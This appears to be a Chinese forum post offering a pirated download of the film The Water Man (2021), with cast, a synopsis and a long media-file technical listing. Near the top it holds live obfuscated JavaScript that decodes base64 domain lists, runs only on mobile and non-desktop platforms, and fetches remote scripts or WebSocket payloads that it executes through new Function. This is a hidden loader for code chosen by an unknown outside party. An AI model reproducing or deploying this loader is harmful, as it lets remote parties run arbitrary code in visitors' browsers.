寻找奇迹水人[中文字幕]The.Water.Man.2021.1080p.NF.WEB-DL.DDP5.1.x264-迅雷下载 8.83GB

版主小s 23天前 275

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x49\x6e\x58\x62\x4c\x54\x4c\x79\x4d\x72']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('uawei')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译  名 寻找奇迹水人/水人传说(港)/水手
◎片  名 The Water Man
◎年  代 2020
◎产  地 美国
◎类  别 奇幻 / 冒险
◎语  言 英语
◎上映日期 2020-09-19(多伦多电影节) / 2021-05-07(美国)
◎IMDb评分  4.9/10 from 700 users
◎IMDb链接  https://www.imdb.com/title/tt4779326/
◎豆瓣评分 /10 from 0 users
◎豆瓣链接 https://movie.douban.com/subject/33385881/
◎片  长 92分钟
◎导  演 大卫·奥伊罗 David Oyelowo
◎编  剧 艾玛·尼德尔 Emma Needell
◎主  演 大卫·奥伊罗 David Oyelowo
       罗莎里奥·道森 Rosario Dawson
       朗尼·查维斯 Lonnie Chavis
       阿米尔·米勒 Amiah Miller
       阿尔弗雷德·莫里纳 Alfred Molina
       玛丽亚·贝罗 Maria Bello
       特德·鲁尼 Ted Rooney
       霍尔顿·戈耶特 Holden Goyette
       艾拉·罗斯·帕克斯 Ella Rose Parks
       亚当·邓拉普 Adam Dunlap
       约翰·亨利·惠特克 John Henry Whitaker
       彼得·詹姆斯·德鲁卡 Peter James DeLuca
       丹尼尔·瓦西奇 Daniel Vasic
       凯尔·斯托尔茨 Kyle Stoltz
       切尔·怀特 Chel White

◎标  签 美国 | 家庭 | 奇幻 | 2020 | 冒险 | 亲情 | 剧情 | 成长

◎简  介

  贡纳(朗尼·查维斯饰)为了挽救生病的母亲(罗莎里奥·道森饰),开始寻找掌握永生秘密的神话人物 — 水人。在得到神秘的当地女孩乔(阿米尔·米勒饰)的帮助后,他们一起前往遥远的野马镇森林。但随着他们不断深入,森林变得愈发陌生和危险。而贡纳的父亲(大卫·奥伊罗饰)是他们获救的唯一希望, 他会不惜一切代价找到他们,并将在此过程中发现儿子的真实身份。

  1. General
  2. Unique ID                                : 111573341343485033507457147974275187249 (0x53F03E70CFE3FF6DE0DB101D6B224231)
  3. Complete name                            : [email protected]
  4. Format                                   : Matroska
  5. Format version                           : Version 4
  6. File size                                : 8.82 GiB
  7. Duration                                 : 1 h 33 min
  8. Overall bit rate mode                    : Variable
  9. Overall bit rate                         : 13.6 Mb/s
  10. Encoded date                             : UTC 2021-07-09 10:27:44
  11. Writing application                      : mkvmerge v56.1.0 ('My Friend') 64-bit
  12. Writing library                          : libebml v1.4.2 + libmatroska v1.6.4
  13. Video
  14. ID                                       : 1
  15. Format                                   : AVC
  16. Format/Info                              : Advanced Video Codec
  17. Format profile                           : [email protected]
  18. Format settings                          : CABAC / 4 Ref Frames
  19. Format settings, CABAC                   : Yes
  20. Format settings, Reference frames        : 4 frames
  21. Codec ID                                 : V_MPEG4/ISO/AVC
  22. Duration                                 : 1 h 32 min
  23. Bit rate mode                            : Variable
  24. Bit rate                                 : 2 694 kb/s
  25. Maximum bit rate                         : 20.0 Mb/s
  26. Width                                    : 1 920 pixels
  27. Height                                   : 1 080 pixels
  28. Display aspect ratio                     : 16:9
  29. Frame rate mode                          : Constant
  30. Frame rate                               : 24.000 FPS
  31. Color space                              : YUV
  32. Chroma subsampling                       : 4:2:0
  33. Bit depth                                : 8 bits
  34. Scan type                                : Progressive
  35. Bits/(Pixel*Frame)                       : 0.054
  36. Stream size                              : 1.75 GiB (20%)
  37. Writing library                          : x264 core 148 r2722 1b0121b
  38. Encoding settings                        : cabac=1 / ref=4 / deblock=1:0:0 / analyse=0x3:0x111 / me=umh / subme=10 / psy=1 / psy_rd=1.00:0.00 / mixed_ref=1 / me_range=120 / chroma_me=1 / trellis=2 / 8x8dct=1 / cqm=0 / deadzone=21,11 / fast_pskip=1 / chroma_qp_offset=-2 / threads=8 / lookahead_threads=2 / sliced_threads=0 / nr=0 / decimate=1 / interlaced=0 / NTMzNTQ= / bluray_compat=0 / stitchable=1 / constrained_intra=0 / bframes=16 / b_pyramid=2 / b_adapt=2 / b_bias=0 / direct=3 / weightb=1 / open_gop=0 / weightp=2 / keyint=240 / keyint_min=121 / scenecut=0 / intra_refresh=0 / rc_lookahead=240 / rc=crf / mbtree=1 / crf=17.0 / qcomp=0.50 / qpmin=6 / qpmax=51 / qpstep=4 / vbv_maxrate=20000 / vbv_bufsize=25000 / crf_max=0.0 / nal_hrd=vbr / filler=0 / NTMzNTQ=LmsMAP37EqsCpk / ip_ratio=1.40 / aq=1:0.80
  39. Default                                  : Yes
  40. Forced                                   : No
  41. Audio #1
  42. ID                                       : 2
  43. Format                                   : E-AC-3
  44. Format/Info                              : Enhanced AC-3
  45. Commercial name                          : Dolby Digital Plus
  46. Codec ID                                 : A_EAC3
  47. Duration                                 : 1 h 33 min
  48. Bit rate mode                            : Constant
  49. Bit rate                                 : 640 kb/s
  50. Channel(s)                               : 6 channels
  51. Channel layout                           : L R C LFE Ls Rs
  52. Sampling rate                            : 48.0 kHz
  53. Frame rate                               : 31.250 FPS (1536 SPF)
  54. Compression mode                         : Lossy
  55. Stream size                              : 426 MiB (5%)
  56. Title                                    : English
  57. Language                                 : English
  58. Service kind                             : Complete Main
  59. Default                                  : Yes
  60. Forced                                   : No
  61. Audio #2
  62. ID                                       : 3
  63. Format                                   : E-AC-3
  64. Format/Info                              : Enhanced AC-3
  65. Commercial name                          : Dolby Digital Plus
  66. Codec ID                                 : A_EAC3
  67. Duration                                 : 1 h 33 min
  68. Bit rate mode                            : Constant
  69. Bit rate                                 : 640 kb/s
  70. Channel(s)                               : 6 channels
  71. Channel layout                           : L R C LFE Ls Rs
  72. Sampling rate                            : 48.0 kHz
  73. Frame rate                               : 31.250 FPS (1536 SPF)
  74. Compression mode                         : Lossy
  75. Stream size                              : 426 MiB (5%)
  76. Title                                    : Arabic
  77. Language                                 : Arabic
  78. Service kind                             : Complete Main
  79. Default                                  : No
  80. Forced                                   : No
  81. Audio #3
  82. ID                                       : 4
  83. Format                                   : E-AC-3
  84. Format/Info                              : Enhanced AC-3
  85. Commercial name                          : Dolby Digital Plus
  86. Codec ID                                 : A_EAC3
  87. Duration                                 : 1 h 33 min
  88. Bit rate mode                            : Constant
  89. Bit rate                                 : 640 kb/s
  90. Channel(s)                               : 6 channels
  91. Channel layout                           : L R C LFE Ls Rs
  92. Sampling rate                            : 48.0 kHz
  93. Frame rate                               : 31.250 FPS (1536 SPF)
  94. Compression mode                         : Lossy
  95. Stream size                              : 426 MiB (5%)
  96. Title                                    : Czech
  97. Language                                 : Czech
  98. Service kind                             : Complete Main
  99. Default                                  : No
  100. Forced                                   : No
  101. Audio #4
  102. ID                                       : 5
  103. Format                                   : E-AC-3
  104. Format/Info                              : Enhanced AC-3
  105. Commercial name                          : Dolby Digital Plus
  106. Codec ID                                 : A_EAC3
  107. Duration                                 : 1 h 33 min
  108. Bit rate mode                            : Constant
  109. Bit rate                                 : 640 kb/s
  110. Channel(s)                               : 6 channels
  111. Channel layout                           : L R C LFE Ls Rs
  112. Sampling rate                            : 48.0 kHz
  113. Frame rate                               : 31.250 FPS (1536 SPF)
  114. Compression mode                         : Lossy
  115. Stream size                              : 426 MiB (5%)
  116. Title                                    : Dutch
  117. Language                                 : Dutch
  118. Service kind                             : Complete Main
  119. Default                                  : No
  120. Forced                                   : No
  121. Audio #5
  122. ID                                       : 6
  123. Format                                   : E-AC-3
  124. Format/Info                              : Enhanced AC-3
  125. Commercial name                          : Dolby Digital Plus
  126. Codec ID                                 : A_EAC3
  127. Duration                                 : 1 h 33 min
  128. Bit rate mode                            : Constant
  129. Bit rate                                 : 640 kb/s
  130. Channel(s)                               : 6 channels
  131. Channel layout                           : L R C LFE Ls Rs
  132. Sampling rate                            : 48.0 kHz
  133. Frame rate                               : 31.250 FPS (1536 SPF)
  134. Compression mode                         : Lossy
  135. Stream size                              : 426 MiB (5%)
  136. Title                                    : French
  137. Language                                 : French
  138. Service kind                             : Complete Main
  139. Default                                  : No
  140. Forced                                   : No
  141. Audio #6
  142. ID                                       : 7
  143. Format                                   : E-AC-3
  144. Format/Info                              : Enhanced AC-3
  145. Commercial name                          : Dolby Digital Plus
  146. Codec ID                                 : A_EAC3
  147. Duration                                 : 1 h 33 min
  148. Bit rate mode                            : Constant
  149. Bit rate                                 : 640 kb/s
  150. Channel(s)                               : 6 channels
  151. Channel layout                           : L R C LFE Ls Rs
  152. Sampling rate                            : 48.0 kHz
  153. Frame rate                               : 31.250 FPS (1536 SPF)
  154. Compression mode                         : Lossy
  155. Stream size                              : 426 MiB (5%)
  156. Title                                    : German
  157. Language                                 : German
  158. Service kind                             : Complete Main
  159. Default                                  : No
  160. Forced                                   : No
  161. Audio #7
  162. ID                                       : 8
  163. Format                                   : E-AC-3
  164. Format/Info                              : Enhanced AC-3
  165. Commercial name                          : Dolby Digital Plus
  166. Codec ID                                 : A_EAC3
  167. Duration                                 : 1 h 33 min
  168. Bit rate mode                            : Constant
  169. Bit rate                                 : 640 kb/s
  170. Channel(s)                               : 6 channels
  171. Channel layout                           : L R C LFE Ls Rs
  172. Sampling rate                            : 48.0 kHz
  173. Frame rate                               : 31.250 FPS (1536 SPF)
  174. Compression mode                         : Lossy
  175. Stream size                              : 426 MiB (5%)
  176. Title                                    : Hindi
  177. Language                                 : Hindi
  178. Service kind                             : Complete Main
  179. Default                                  : No
  180. Forced                                   : No
  181. Audio #8
  182. ID                                       : 9
  183. Format                                   : E-AC-3
  184. Format/Info                              : Enhanced AC-3
  185. Commercial name                          : Dolby Digital Plus
  186. Codec ID                                 : A_EAC3
  187. Duration                                 : 1 h 33 min
  188. Bit rate mode                            : Constant
  189. Bit rate                                 : 640 kb/s
  190. Channel(s)                               : 6 channels
  191. Channel layout                           : L R C LFE Ls Rs
  192. Sampling rate                            : 48.0 kHz
  193. Frame rate                               : 31.250 FPS (1536 SPF)
  194. Compression mode                         : Lossy
  195. Stream size                              : 426 MiB (5%)
  196. Title                                    : Hungarian
  197. Language                                 : Hungarian
  198. Service kind                             : Complete Main
  199. Default                                  : No
  200. Forced                                   : No
  201. Audio #9
  202. ID                                       : 10
  203. Format                                   : E-AC-3
  204. Format/Info                              : Enhanced AC-3
  205. Commercial name                          : Dolby Digital Plus
  206. Codec ID                                 : A_EAC3
  207. Duration                                 : 1 h 33 min
  208. Bit rate mode                            : Constant
  209. Bit rate                                 : 640 kb/s
  210. Channel(s)                               : 6 channels
  211. Channel layout                           : L R C LFE Ls Rs
  212. Sampling rate                            : 48.0 kHz
  213. Frame rate                               : 31.250 FPS (1536 SPF)
  214. Compression mode                         : Lossy
  215. Stream size                              : 426 MiB (5%)
  216. Title                                    : Italian
  217. Language                                 : Italian
  218. Service kind                             : Complete Main
  219. Default                                  : No
  220. Forced                                   : No
  221. Audio #10
  222. ID                                       : 11
  223. Format                                   : E-AC-3
  224. Format/Info                              : Enhanced AC-3
  225. Commercial name                          : Dolby Digital Plus
  226. Codec ID                                 : A_EAC3
  227. Duration                                 : 1 h 33 min
  228. Bit rate mode                            : Constant
  229. Bit rate                                 : 640 kb/s
  230. Channel(s)                               : 6 channels
  231. Channel layout                           : L R C LFE Ls Rs
  232. Sampling rate                            : 48.0 kHz
  233. Frame rate                               : 31.250 FPS (1536 SPF)
  234. Compression mode                         : Lossy
  235. Stream size                              : 426 MiB (5%)
  236. Title                                    : Polish
  237. Language                                 : Polish
  238. Service kind                             : Complete Main
  239. Default                                  : No
  240. Forced                                   : No
  241. Audio #11
  242. ID                                       : 12
  243. Format                                   : E-AC-3
  244. Format/Info                              : Enhanced AC-3
  245. Commercial name                          : Dolby Digital Plus
  246. Codec ID                                 : A_EAC3
  247. Duration                                 : 1 h 33 min
  248. Bit rate mode                            : Constant
  249. Bit rate                                 : 640 kb/s
  250. Channel(s)                               : 6 channels
  251. Channel layout                           : L R C LFE Ls Rs
  252. Sampling rate                            : 48.0 kHz
  253. Frame rate                               : 31.250 FPS (1536 SPF)
  254. Compression mode                         : Lossy
  255. Stream size                              : 426 MiB (5%)
  256. Title                                    : Brazilian Portuguese
  257. Language                                 : Portuguese
  258. Service kind                             : Complete Main
  259. Default                                  : No
  260. Forced                                   : No
  261. Audio #12
  262. ID                                       : 13
  263. Format                                   : E-AC-3
  264. Format/Info                              : Enhanced AC-3
  265. Commercial name                          : Dolby Digital Plus
  266. Codec ID                                 : A_EAC3
  267. Duration                                 : 1 h 33 min
  268. Bit rate mode                            : Constant
  269. Bit rate                                 : 640 kb/s
  270. Channel(s)                               : 6 channels
  271. Channel layout                           : L R C LFE Ls Rs
  272. Sampling rate                            : 48.0 kHz
  273. Frame rate                               : 31.250 FPS (1536 SPF)
  274. Compression mode                         : Lossy
  275. Stream size                              : 426 MiB (5%)
  276. Title                                    : Russian
  277. Language                                 : Russian
  278. Service kind                             : Complete Main
  279. Default                                  : No
  280. Forced                                   : No
  281. Audio #13
  282. ID                                       : 14
  283. Format                                   : E-AC-3
  284. Format/Info                              : Enhanced AC-3
  285. Commercial name                          : Dolby Digital Plus
  286. Codec ID                                 : A_EAC3
  287. Duration                                 : 1 h 33 min
  288. Bit rate mode                            : Constant
  289. Bit rate                                 : 640 kb/s
  290. Channel(s)                               : 6 channels
  291. Channel layout                           : L R C LFE Ls Rs
  292. Sampling rate                            : 48.0 kHz
  293. Frame rate                               : 31.250 FPS (1536 SPF)
  294. Compression mode                         : Lossy
  295. Stream size                              : 426 MiB (5%)
  296. Title                                    : Spanish
  297. Language                                 : Spanish
  298. Service kind                             : Complete Main
  299. Default                                  : No
  300. Forced                                   : No
  301. Audio #14
  302. ID                                       : 15
  303. Format                                   : E-AC-3
  304. Format/Info                              : Enhanced AC-3
  305. Commercial name                          : Dolby Digital Plus
  306. Codec ID                                 : A_EAC3
  307. Duration                                 : 1 h 33 min
  308. Bit rate mode                            : Constant
  309. Bit rate                                 : 640 kb/s
  310. Channel(s)                               : 6 channels
  311. Channel layout                           : L R C LFE Ls Rs
  312. Sampling rate                            : 48.0 kHz
  313. Frame rate                               : 31.250 FPS (1536 SPF)
  314. Compression mode                         : Lossy
  315. Stream size                              : 426 MiB (5%)
  316. Title                                    : European Spanish
  317. Language                                 : Spanish
  318. Service kind                             : Complete Main
  319. Default                                  : No
  320. Forced                                   : No
  321. Audio #15
  322. ID                                       : 16
  323. Format                                   : E-AC-3
  324. Format/Info                              : Enhanced AC-3
  325. Commercial name                          : Dolby Digital Plus
  326. Codec ID                                 : A_EAC3
  327. Duration                                 : 1 h 33 min
  328. Bit rate mode                            : Constant
  329. Bit rate                                 : 640 kb/s
  330. Channel(s)                               : 6 channels
  331. Channel layout                           : L R C LFE Ls Rs
  332. Sampling rate                            : 48.0 kHz
  333. Frame rate                               : 31.250 FPS (1536 SPF)
  334. Compression mode                         : Lossy
  335. Stream size                              : 426 MiB (5%)
  336. Title                                    : Swedish
  337. Language                                 : Swedish
  338. Service kind                             : Complete Main
  339. Default                                  : No
  340. Forced                                   : No
  341. Audio #16
  342. ID                                       : 17
  343. Format                                   : E-AC-3
  344. Format/Info                              : Enhanced AC-3
  345. Commercial name                          : Dolby Digital Plus
  346. Codec ID                                 : A_EAC3
  347. Duration                                 : 1 h 33 min
  348. Bit rate mode                            : Constant
  349. Bit rate                                 : 640 kb/s
  350. Channel(s)                               : 6 channels
  351. Channel layout                           : L R C LFE Ls Rs
  352. Sampling rate                            : 48.0 kHz
  353. Frame rate                               : 31.250 FPS (1536 SPF)
  354. Compression mode                         : Lossy
  355. Stream size                              : 426 MiB (5%)
  356. Title                                    : Thai
  357. Language                                 : Thai
  358. Service kind                             : Complete Main
  359. Default                                  : No
  360. Forced                                   : No
  361. Audio #17
  362. ID                                       : 18
  363. Format                                   : E-AC-3
  364. Format/Info                              : Enhanced AC-3
  365. Commercial name                          : Dolby Digital Plus
  366. Codec ID                                 : A_EAC3
  367. Duration                                 : 1 h 33 min
  368. Bit rate mode                            : Constant
  369. Bit rate                                 : 640 kb/s
  370. Channel(s)                               : 6 channels
  371. Channel layout                           : L R C LFE Ls Rs
  372. Sampling rate                            : 48.0 kHz
  373. Frame rate                               : 31.250 FPS (1536 SPF)
  374. Compression mode                         : Lossy
  375. Stream size                              : 426 MiB (5%)
  376. Title                                    : Turkish
  377. Language                                 : Turkish
  378. Service kind                             : Complete Main
  379. Default                                  : No
  380. Forced                                   : No
  381. Text #1
  382. ID                                       : 19
  383. Format                                   : UTF-8
  384. Codec ID                                 : S_TEXT/UTF8
  385. Codec ID/Info                            : UTF-8 Plain Text
  386. Duration                                 : 1 h 31 min
  387. Bit rate                                 : 67 b/s
  388. Count of elements                        : 1266
  389. Stream size                              : 44.8 KiB (0%)
  390. Title                                    : English
  391. Language                                 : English
  392. Default                                  : No
  393. Forced                                   : No
  394. Text #2
  395. ID                                       : 20
  396. Format                                   : UTF-8
  397. Codec ID                                 : S_TEXT/UTF8
  398. Codec ID/Info                            : UTF-8 Plain Text
  399. Duration                                 : 1 h 30 min
  400. Bit rate                                 : 61 b/s
  401. Count of elements                        : 876
  402. Stream size                              : 41.0 KiB (0%)
  403. Title                                    : Arabic
  404. Language                                 : Arabic
  405. Default                                  : No
  406. Forced                                   : No
  407. Text #3
  408. ID                                       : 21
  409. Format                                   : UTF-8
  410. Codec ID                                 : S_TEXT/UTF8
  411. Codec ID/Info                            : UTF-8 Plain Text
  412. Duration                                 : 1 h 30 min
  413. Bit rate                                 : 36 b/s
  414. Count of elements                        : 906
  415. Stream size                              : 24.5 KiB (0%)
  416. Title                                    : Chinese Simplified
  417. Language                                 : Chinese
  418. Default                                  : No
  419. Forced                                   : No
  420. Text #4
  421. ID                                       : 22
  422. Format                                   : UTF-8
  423. Codec ID                                 : S_TEXT/UTF8
  424. Codec ID/Info                            : UTF-8 Plain Text
  425. Duration                                 : 1 h 30 min
  426. Bit rate                                 : 36 b/s
  427. Count of elements                        : 905
  428. Stream size                              : 24.4 KiB (0%)
  429. Title                                    : Chinese Traditional
  430. Language                                 : Chinese
  431. Default                                  : No
  432. Forced                                   : No
  433. Text #5
  434. ID                                       : 23
  435. Format                                   : UTF-8
  436. Codec ID                                 : S_TEXT/UTF8
  437. Codec ID/Info                            : UTF-8 Plain Text
  438. Duration                                 : 1 h 30 min
  439. Bit rate                                 : 29 b/s
  440. Count of elements                        : 866
  441. Stream size                              : 19.3 KiB (0%)
  442. Title                                    : Croatian
  443. Language                                 : Croatian
  444. Default                                  : No
  445. Forced                                   : No
  446. Text #6
  447. ID                                       : 24
  448. Format                                   : UTF-8
  449. Codec ID                                 : S_TEXT/UTF8
  450. Codec ID/Info                            : UTF-8 Plain Text
  451. Duration                                 : 1 h 30 min
  452. Bit rate                                 : 35 b/s
  453. Count of elements                        : 867
  454. Stream size                              : 23.4 KiB (0%)
  455. Title                                    : Czech
  456. Language                                 : Czech
  457. Default                                  : No
  458. Forced                                   : No
  459. Text #7
  460. ID                                       : 25
  461. Format                                   : UTF-8
  462. Codec ID                                 : S_TEXT/UTF8
  463. Codec ID/Info                            : UTF-8 Plain Text
  464. Duration                                 : 1 h 30 min
  465. Bit rate                                 : 29 b/s
  466. Count of elements                        : 882
  467. Stream size                              : 19.6 KiB (0%)
  468. Title                                    : Danish
  469. Language                                 : Danish
  470. Default                                  : No
  471. Forced                                   : No
  472. Text #8
  473. ID                                       : 26
  474. Format                                   : UTF-8
  475. Codec ID                                 : S_TEXT/UTF8
  476. Codec ID/Info                            : UTF-8 Plain Text
  477. Duration                                 : 1 h 30 min
  478. Bit rate                                 : 29 b/s
  479. Count of elements                        : 786
  480. Stream size                              : 19.8 KiB (0%)
  481. Title                                    : Dutch
  482. Language                                 : Dutch
  483. Default                                  : No
  484. Forced                                   : No
  485. Text #9
  486. ID                                       : 27
  487. Format                                   : UTF-8
  488. Codec ID                                 : S_TEXT/UTF8
  489. Codec ID/Info                            : UTF-8 Plain Text
  490. Duration                                 : 1 h 30 min
  491. Bit rate                                 : 33 b/s
  492. Count of elements                        : 831
  493. Stream size                              : 22.4 KiB (0%)
  494. Title                                    : Finnish
  495. Language                                 : Finnish
  496. Default                                  : No
  497. Forced                                   : No
  498. Text #10
  499. ID                                       : 28
  500. Format                                   : UTF-8
  501. Codec ID                                 : S_TEXT/UTF8
  502. Codec ID/Info                            : UTF-8 Plain Text
  503. Duration                                 : 1 h 30 min
  504. Bit rate                                 : 34 b/s
  505. Count of elements                        : 792
  506. Stream size                              : 22.7 KiB (0%)
  507. Title                                    : French
  508. Language                                 : French
  509. Default                                  : No
  510. Forced                                   : No
  511. Text #11
  512. ID                                       : 29
  513. Format                                   : UTF-8
  514. Codec ID                                 : S_TEXT/UTF8
  515. Codec ID/Info                            : UTF-8 Plain Text
  516. Duration                                 : 1 h 30 min
  517. Bit rate                                 : 32 b/s
  518. Count of elements                        : 803
  519. Stream size                              : 21.4 KiB (0%)
  520. Title                                    : German
  521. Language                                 : German
  522. Default                                  : No
  523. Forced                                   : No
  524. Text #12
  525. ID                                       : 30
  526. Format                                   : UTF-8
  527. Codec ID                                 : S_TEXT/UTF8
  528. Codec ID/Info                            : UTF-8 Plain Text
  529. Duration                                 : 1 h 30 min
  530. Bit rate                                 : 53 b/s
  531. Count of elements                        : 806
  532. Stream size                              : 35.3 KiB (0%)
  533. Title                                    : Greek
  534. Language                                 : Greek
  535. Default                                  : No
  536. Forced                                   : No
  537. Text #13
  538. ID                                       : 31
  539. Format                                   : UTF-8
  540. Codec ID                                 : S_TEXT/UTF8
  541. Codec ID/Info                            : UTF-8 Plain Text
  542. Duration                                 : 1 h 30 min
  543. Bit rate                                 : 58 b/s
  544. Count of elements                        : 908
  545. Stream size                              : 39.1 KiB (0%)
  546. Title                                    : Hebrew
  547. Language                                 : Hebrew
  548. Default                                  : No
  549. Forced                                   : No
  550. Text #14
  551. ID                                       : 32
  552. Format                                   : UTF-8
  553. Codec ID                                 : S_TEXT/UTF8
  554. Codec ID/Info                            : UTF-8 Plain Text
  555. Duration                                 : 1 h 30 min
  556. Bit rate                                 : 30 b/s
  557. Count of elements                        : 849
  558. Stream size                              : 20.0 KiB (0%)
  559. Title                                    : Hungarian
  560. Language                                 : Hungarian
  561. Default                                  : No
  562. Forced                                   : No
  563. Text #15
  564. ID                                       : 33
  565. Format                                   : UTF-8
  566. Codec ID                                 : S_TEXT/UTF8
  567. Codec ID/Info                            : UTF-8 Plain Text
  568. Duration                                 : 1 h 30 min
  569. Bit rate                                 : 31 b/s
  570. Count of elements                        : 894
  571. Stream size                              : 21.0 KiB (0%)
  572. Title                                    : Indonesian
  573. Language                                 : Indonesian
  574. Default                                  : No
  575. Forced                                   : No
  576. Text #16
  577. ID                                       : 34
  578. Format                                   : UTF-8
  579. Codec ID                                 : S_TEXT/UTF8
  580. Codec ID/Info                            : UTF-8 Plain Text
  581. Duration                                 : 1 h 30 min
  582. Bit rate                                 : 32 b/s
  583. Count of elements                        : 818
  584. Stream size                              : 21.5 KiB (0%)
  585. Title                                    : Italian
  586. Language                                 : Italian
  587. Default                                  : No
  588. Forced                                   : No
  589. Text #17
  590. ID                                       : 35
  591. Format                                   : UTF-8
  592. Codec ID                                 : S_TEXT/UTF8
  593. Codec ID/Info                            : UTF-8 Plain Text
  594. Duration                                 : 1 h 30 min
  595. Bit rate                                 : 39 b/s
  596. Count of elements                        : 912
  597. Stream size                              : 26.4 KiB (0%)
  598. Title                                    : Japanese
  599. Language                                 : Japanese
  600. Default                                  : No
  601. Forced                                   : No
  602. Text #18
  603. ID                                       : 36
  604. Format                                   : UTF-8
  605. Codec ID                                 : S_TEXT/UTF8
  606. Codec ID/Info                            : UTF-8 Plain Text
  607. Duration                                 : 1 h 30 min
  608. Bit rate                                 : 44 b/s
  609. Count of elements                        : 919
  610. Stream size                              : 29.5 KiB (0%)
  611. Title                                    : Korean
  612. Language                                 : Korean
  613. Default                                  : No
  614. Forced                                   : No
  615. Text #19
  616. ID                                       : 37
  617. Format                                   : UTF-8
  618. Codec ID                                 : S_TEXT/UTF8
  619. Codec ID/Info                            : UTF-8 Plain Text
  620. Duration                                 : 1 h 30 min
  621. Bit rate                                 : 34 b/s
  622. Count of elements                        : 887
  623. Stream size                              : 23.2 KiB (0%)
  624. Title                                    : Malay
  625. Language                                 : Malay
  626. Default                                  : No
  627. Forced                                   : No
  628. Text #20
  629. ID                                       : 38
  630. Format                                   : UTF-8
  631. Codec ID                                 : S_TEXT/UTF8
  632. Codec ID/Info                            : UTF-8 Plain Text
  633. Duration                                 : 1 h 30 min
  634. Bit rate                                 : 31 b/s
  635. Count of elements                        : 819
  636. Stream size                              : 21.0 KiB (0%)
  637. Title                                    : Norwegian Bokmal
  638. Language                                 : Norwegian Bokmal
  639. Default                                  : No
  640. Forced                                   : No
  641. Text #21
  642. ID                                       : 39
  643. Format                                   : UTF-8
  644. Codec ID                                 : S_TEXT/UTF8
  645. Codec ID/Info                            : UTF-8 Plain Text
  646. Duration                                 : 1 h 30 min
  647. Bit rate                                 : 30 b/s
  648. Count of elements                        : 813
  649. Stream size                              : 20.5 KiB (0%)
  650. Title                                    : Polish
  651. Language                                 : Polish
  652. Default                                  : No
  653. Forced                                   : No
  654. Text #22
  655. ID                                       : 40
  656. Format                                   : UTF-8
  657. Codec ID                                 : S_TEXT/UTF8
  658. Codec ID/Info                            : UTF-8 Plain Text
  659. Duration                                 : 1 h 30 min
  660. Bit rate                                 : 31 b/s
  661. Count of elements                        : 819
  662. Stream size                              : 20.8 KiB (0%)
  663. Title                                    : Portuguese
  664. Language                                 : Portuguese
  665. Default                                  : No
  666. Forced                                   : No
  667. Text #23
  668. ID                                       : 41
  669. Format                                   : UTF-8
  670. Codec ID                                 : S_TEXT/UTF8
  671. Codec ID/Info                            : UTF-8 Plain Text
  672. Duration                                 : 1 h 30 min
  673. Bit rate                                 : 34 b/s
  674. Count of elements                        : 896
  675. Stream size                              : 22.8 KiB (0%)
  676. Title                                    : Brazilian Portuguese
  677. Language                                 : Portuguese
  678. Default                                  : No
  679. Forced                                   : No
  680. Text #24
  681. ID                                       : 42
  682. Format                                   : UTF-8
  683. Codec ID                                 : S_TEXT/UTF8
  684. Codec ID/Info                            : UTF-8 Plain Text
  685. Duration                                 : 1 h 30 min
  686. Bit rate                                 : 36 b/s
  687. Count of elements                        : 892
  688. Stream size                              : 24.2 KiB (0%)
  689. Title                                    : Romanian
  690. Language                                 : Romanian
  691. Default                                  : No
  692. Forced                                   : No
  693. Text #25
  694. ID                                       : 43
  695. Format                                   : UTF-8
  696. Codec ID                                 : S_TEXT/UTF8
  697. Codec ID/Info                            : UTF-8 Plain Text
  698. Duration                                 : 1 h 30 min
  699. Bit rate                                 : 48 b/s
  700. Count of elements                        : 853
  701. Stream size                              : 32.2 KiB (0%)
  702. Title                                    : Russian
  703. Language                                 : Russian
  704. Default                                  : No
  705. Forced                                   : No
  706. Text #26
  707. ID                                       : 44
  708. Format                                   : UTF-8
  709. Codec ID                                 : S_TEXT/UTF8
  710. Codec ID/Info                            : UTF-8 Plain Text
  711. Duration                                 : 1 h 30 min
  712. Bit rate                                 : 31 b/s
  713. Count of elements                        : 887
  714. Stream size                              : 20.7 KiB (0%)
  715. Title                                    : Spanish
  716. Language                                 : Spanish
  717. Default                                  : No
  718. Forced                                   : No
  719. Text #27
  720. ID                                       : 45
  721. Format                                   : UTF-8
  722. Codec ID                                 : S_TEXT/UTF8
  723. Codec ID/Info                            : UTF-8 Plain Text
  724. Duration                                 : 1 h 30 min
  725. Bit rate                                 : 30 b/s
  726. Count of elements                        : 904
  727. Stream size                              : 20.2 KiB (0%)
  728. Title                                    : European Spanish
